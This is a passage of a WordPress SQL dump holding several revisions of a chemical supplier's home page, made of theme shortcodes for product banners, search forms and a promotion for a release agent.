LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="138" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:57:25', '2016-08-15 22:57:25', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (147, 1, '2016-08-15 22:58:42', '2016-08-15 22:58:42', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:58:42', '2016-08-15 22:58:42', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (149, 1, '2016-08-15 23:05:07', '2016-08-15 23:05:07', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:05:07', '2016-08-15 23:05:07', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (150, 1, '2016-08-15 23:06:14', '2016-08-15 23:06:14', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:06:14', '2016-08-15 23:06:14', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (152, 1, '2016-08-15 23:11:00', '2016-08-15 23:11:00', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n<br/>\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:11:00', '2016-08-15 23:11:00', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (153, 1, '2016-08-15 23:11:30', '2016-08-15 23:11:30', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n<br/>\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n&nbsp;\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:11:30', '2016-08-15 23:11:30', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (154, 1, '2016-08-15 23:11:56', '2016-08-15 23:11:56', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by 